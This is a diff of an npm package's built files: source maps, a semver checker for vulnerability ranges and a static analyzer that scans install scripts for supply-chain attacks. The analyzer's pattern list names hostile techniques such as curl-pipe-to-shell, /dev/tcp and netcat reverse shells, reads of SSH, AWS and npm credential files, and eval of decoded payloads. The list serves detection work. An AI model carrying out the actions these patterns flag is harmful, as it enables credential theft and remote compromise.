AAE,CAAC,IAAI,CAAC,EAAE,CAAC,OAAO,CAAC,EAAE,CAAC;SAC5C,CAAC,CAAA;QACF,IAAI,CAAC,GAAG,CAAC,EAAE;YAAE,OAAO,EAAE,CAAA;QACtB,MAAM,IAAI,GAAG,CAAC,MAAM,GAAG,CAAC,IAAI,EAAE,CAAkC,CAAA;QAChE,MAAM,UAAU,GAAG,IAAI,CAAC,IAAI,CAAC,IAAI,EAAE,CAAA;QACnC,QAAQ,CAAC,GAAG,EAAE,UAAU,CAAC,CAAA;QACzB,OAAO,UAAU,CAAA;IACnB,CAAC;IAAC,MAAM,CAAC;QACP,OAAO,EAAE,CAAA;IACX,CAAC;AACH,CAAC"}
+{"version":3,"file":"registry.js","sourceRoot":"","sources":["../src/registry.ts"],"names":[],"mappings":"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"}

package/dist/script-analysis.d.ts

@@ -0,0 +1,20 @@
+/**
+ * Analyze install scripts for suspicious patterns.
+ * Checks for common supply chain attack vectors without executing anything.
+ */
+export interface ScriptAnalysis {
+    suspicious: boolean;
+    risks: ScriptRisk[];
+}
+export interface ScriptRisk {
+    script: string;
+    pattern: string;
+    severity: 'critical' | 'high' | 'moderate';
+    description: string;
+}
+/**
+ * Analyze package scripts for suspicious patterns.
+ * Does NOT execute any scripts — purely static pattern matching.
+ */
+export declare function analyzeScripts(scripts: Record<string, string> | undefined): ScriptAnalysis;
+//# sourceMappingURL=script-analysis.d.ts.map

package/dist/script-analysis.d.ts.map

@@ -0,0 +1 @@
+{"version":3,"file":"script-analysis.d.ts","sourceRoot":"","sources":["../src/script-analysis.ts"],"names":[],"mappings":"AAAA;;;GAGG;AAEH,MAAM,WAAW,cAAc;IAC7B,UAAU,EAAE,OAAO,CAAA;IACnB,KAAK,EAAE,UAAU,EAAE,CAAA;CACpB;AAED,MAAM,WAAW,UAAU;IACzB,MAAM,EAAE,MAAM,CAAA;IACd,OAAO,EAAE,MAAM,CAAA;IACf,QAAQ,EAAE,UAAU,GAAG,MAAM,GAAG,UAAU,CAAA;IAC1C,WAAW,EAAE,MAAM,CAAA;CACpB;AAoHD;;;GAGG;AACH,wBAAgB,cAAc,CAAC,OAAO,EAAE,MAAM,CAAC,MAAM,EAAE,MAAM,CAAC,GAAG,SAAS,GAAG,cAAc,CAyB1F"}

package/dist/script-analysis.js

@@ -0,0 +1,139 @@
+/**
+ * Analyze install scripts for suspicious patterns.
+ * Checks for common supply chain attack vectors without executing anything.
+ */
+const SUSPICIOUS_PATTERNS = [
+    // Network exfiltration
+    {
+        regex: /curl\s.*\|.*(?:sh|bash|zsh)/i,
+        severity: 'critical',
+        description: 'Downloads and executes remote code (curl | sh)',
+    },
+    {
+        regex: /wget\s.*\|.*(?:sh|bash|zsh)/i,
+        severity: 'critical',
+        description: 'Downloads and executes remote code (wget | sh)',
+    },
+    {
+        regex: /curl\s.*-o\s.*&&.*(?:sh|bash|chmod)/i,
+        severity: 'critical',
+        description: 'Downloads file and executes it',
+    },
+    // Typosquatting shell — ssh instead of sh
+    {
+        regex: /\bssh\b.*(?:install|setup|init)/i,
+        severity: 'critical',
+        description: 'Suspicious use of ssh in install script (possible typosquatting of sh)',
+    },
+    {
+        regex: /\/bin\/ssh\b/,
+        severity: 'critical',
+        description: 'References /bin/ssh instead of /bin/sh (likely malicious)',
+    },
+    // Environment variable access (credential theft)
+    {
+        regex: /process\.env\b/,
+        severity: 'high',
+        description: 'Accesses environment variables (potential credential theft)',
+    },
+    {
+        regex: /\$(?:HOME|USER|NPM_TOKEN|AWS_|GITHUB_TOKEN|API_KEY|SECRET|PASSWORD|PRIVATE_KEY)/i,
+        severity: 'critical',
+        description: 'Accesses sensitive environment variables',
+    },
+    // Encoded payloads
+    {
+        regex: /(?:atob|Buffer\.from)\s*\([^)]*,\s*['"]base64['"]/,
+        severity: 'high',
+        description: 'Decodes base64 content (possibly hiding malicious payload)',
+    },
+    {
+        regex: /eval\s*\(\s*(?:atob|Buffer|unescape|decodeURI)/,
+        severity: 'critical',
+        description: 'Evaluates decoded/obfuscated code',
+    },
+    {
+        regex: /\\x[0-9a-f]{2}(?:\\x[0-9a-f]{2}){5,}/i,
+        severity: 'high',
+        description: 'Contains hex-encoded strings (possible obfuscation)',
+    },
+    // Network calls
+    {
+        regex: /https?:\/\/(?!(?:registry\.npmjs\.org|github\.com|nodejs\.org))/i,
+        severity: 'moderate',
+        description: 'Makes network request to external URL',
+    },
+    {
+        regex: /net\.connect|dgram|dns\.resolve|fetch\s*\(/,
+        severity: 'high',
+        description: 'Uses network APIs in install script',
+    },
+    // File system access to sensitive paths
+    {
+        regex: /\/etc\/(?:passwd|shadow|hosts)/,
+        severity: 'critical',
+        description: 'Accesses system credential files',
+    },
+    {
+        regex: /~\/\.ssh|~\/\.aws|~\/\.npmrc|~\/\.env/,
+        severity: 'critical',
+        description: 'Accesses sensitive config files (SSH keys, AWS creds, npm tokens)',
+    },
+    {
+        regex: /~\/\.gnupg|~\/\.config\/gh/,
+        severity: 'critical',
+        description: 'Accesses GPG or GitHub CLI credentials',
+    },
+    // Code execution
+    {
+        regex: /child_process|exec\s*\(|execSync|spawn\s*\(/,
+        severity: 'high',
+        description: 'Spawns child processes in install script',
+    },
+    {
+        regex: /eval\s*\(/,
+        severity: 'high',
+        description: 'Uses eval() (dynamic code execution)',
+    },
+    // Reverse shells
+    {
+        regex: /\/dev\/tcp\//,
+        severity: 'critical',
+        description: 'Uses /dev/tcp (reverse shell pattern)',
+    },
+    {
+        regex: /nc\s+-[a-z]*e\s/i,
+        severity: 'critical',
+        description: 'Uses netcat with execute flag (reverse shell)',
+    },
+];
+const INSTALL_SCRIPT_NAMES = ['preinstall', 'install', 'postinstall'];
+/**
+ * Analyze package scripts for suspicious patterns.
+ * Does NOT execute any scripts — purely static pattern matching.
+ */
+export function analyzeScripts(scripts) {
+    if (!scripts)
+        return { suspicious: false, risks: [] };
+    const risks = [];
+    for (const scriptName of INSTALL_SCRIPT_NAMES) {
+        const content = scripts[scriptName];
+        if (!content)
+            continue;
+        for (const rule of SUSPICIOUS_PATTERNS) {
+            if (rule.regex.test(content)) {
+                risks.push({
+                    script: scriptName,
+                    pattern: rule.regex.source.slice(0, 60),
+                    severity: rule.severity,
+                    description: rule.description,
+                });
+            }
+        }
+    }
+    return {
+        suspicious: risks.length > 0,
+        risks,
+    };
+}
+//# sourceMappingURL=script-analysis.js.map

package/dist/script-analysis.js.map

@@ -0,0 +1 @@
+{"version":3,"file":"script-analysis.js","sourceRoot":"","sources":["../src/script-analysis.ts"],"names":[],"mappings":"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"}

package/dist/semver.d.ts

@@ -0,0 +1,19 @@
+/**
+ * Minimal semver range checker — zero dependencies.
+ * Supports common version range patterns from GitHub advisories:
+ *   "< 4.0.0", ">= 1.0.0, < 2.0.0", "<= 3.5.0", "= 1.2.3"
+ *
+ * Does NOT support: ||, ~, ^, *, x, pre-release tags, build metadata.
+ * This is intentional — advisory ranges use simple comparators.
+ */
+/**
+ * Check if a version satisfies a vulnerability range string.
+ * Returns true if the version IS vulnerable (falls within the range).
+ *
+ * Examples:
+ *   satisfiesRange("4.17.21", "< 4.17.20")  → false (not vulnerable)
+ *   satisfiesRange("4.17.19", "< 4.17.20")  → true  (vulnerable)
+ *   satisfiesRange("1.5.0", ">= 1.0.0, < 2.0.0") → true (vulnerable)
+ */
+export declare function satisfiesRange(version: string, range: string): boolean;
+//# sourceMappingURL=semver.d.ts.map

package/dist/semver.d.ts.map

@@ -0,0 +1 @@
+{"version":3,"file":"semver.d.ts","sourceRoot":"","sources":["../src/semver.ts"],"names":[],"mappings":"AAAA;;;;;;;GAOG;AAwCH;;;;;;;;GAQG;AACH,wBAAgB,cAAc,CAAC,OAAO,EAAE,MAAM,EAAE,KAAK,EAAE,MAAM,GAAG,OAAO,CAuBtE"}

package/dist/semver.js

@@ -0,0 +1,71 @@
+/**
+ * Minimal semver range checker — zero dependencies.
+ * Supports common version range patterns from GitHub advisories:
+ *   "< 4.0.0", ">= 1.0.0, < 2.0.0", "<= 3.5.0", "= 1.2.3"
+ *
+ * Does NOT support: ||, ~, ^, *, x, pre-release tags, build metadata.
+ * This is intentional — advisory ranges use simple comparators.
+ */
+function parse(version) {
+    // Strip leading 'v' and any pre-release/build suffix
+    const clean = version.replace(/^v/, '').replace(/[-+].*$/, '').trim();
+    const parts = clean.split('.');
+    if (parts.length < 2)
+        return null;
+    const major = parseInt(parts[0], 10);
+    const minor = parseInt(parts[1], 10);
+    const patch = parts.length >= 3 ? parseInt(parts[2], 10) : 0;
+    if (isNaN(major) || isNaN(minor) || isNaN(patch))
+        return null;
+    return { major, minor, patch };
+}
+function compare(a, b) {
+    if (a.major !== b.major)
+        return a.major - b.major;
+    if (a.minor !== b.minor)
+        return a.minor - b.minor;
+    return a.patch - b.patch;
+}
+function matchComparator(version, op, target) {
+    const cmp = compare(version, target);
+    switch (op) {
+        case '<': return cmp < 0;
+        case '<=': return cmp <= 0;
+        case '>': return cmp > 0;
+        case '>=': return cmp >= 0;
+        case '=': return cmp === 0;
+        default: return cmp === 0;
+    }
+}
+/**
+ * Check if a version satisfies a vulnerability range string.
+ * Returns true if the version IS vulnerable (falls within the range).
+ *
+ * Examples:
+ *   satisfiesRange("4.17.21", "< 4.17.20")  → false (not vulnerable)
+ *   satisfiesRange("4.17.19", "< 4.17.20")  → true  (vulnerable)
+ *   satisfiesRange("1.5.0", ">= 1.0.0, < 2.0.0") → true (vulnerable)
+ */
+export function satisfiesRange(version, range) {
+    const ver = parse(version);
+    if (!ver)
+        return true; // If we can't parse, assume vulnerable (safe default)
+    if (!range || range === '*')
+        return true;
+    // Split by comma for compound ranges: ">= 1.0.0, < 2.0.0"
+    const parts = range.split(',').map(s => s.trim()).filter(Boolean);
+    for (const part of parts) {
+        const match = part.match(/^(>=|<=|>|<|=)\s*(.+)$/);
+        if (!match)
+            continue;
+        const op = match[1];
+        const target = parse(match[2]);
+        if (!target)
+            continue;
+        if (!matchComparator(ver, op, target)) {
+            return false; // One condition not met → not in vulnerable range
+        }
+    }
+    return true;
+}
+//# sourceMappingURL=semver.js.map

package/dist/semver.js.map

@@ -0,0 +1 @@
+{"version":3,"file":"semver.js","sourceRoot":"","sources":["../src/semver.ts"],"names":[],"mappings":"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"}

package/dist/tokens.d.ts.map

@@ -1 +1 @@
